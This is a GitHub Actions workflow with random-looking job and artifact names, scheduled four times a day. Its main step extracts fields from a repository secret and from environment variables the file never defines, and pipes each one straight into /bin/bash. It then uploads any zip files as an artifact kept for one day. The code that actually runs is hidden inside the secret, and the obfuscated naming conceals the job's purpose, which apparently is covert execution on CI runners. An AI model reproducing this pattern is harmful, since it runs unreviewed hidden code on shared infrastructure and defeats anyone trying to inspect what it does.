name: huangzhangboliang
on:
  workflow_dispatch:

  schedule:
    - cron: '49 3,9,15,21 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: huangzhangboliang
        env:
          si21953: ${{ secrets.si21953 }}
        run: |
          printf '%s' "$si21953" | jq -r .j9 | /bin/bash
          echo $hwfw945 | jq -r .to70 | /bin/bash
          printf '%s' "$lyquu2" | jq -r .gqfp571 | /bin/bash
          printf '%s' "$qixkw54339" | jq -r .u7 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: vuz5l7Xw
          path: "*.zip"
          retention-days: 1
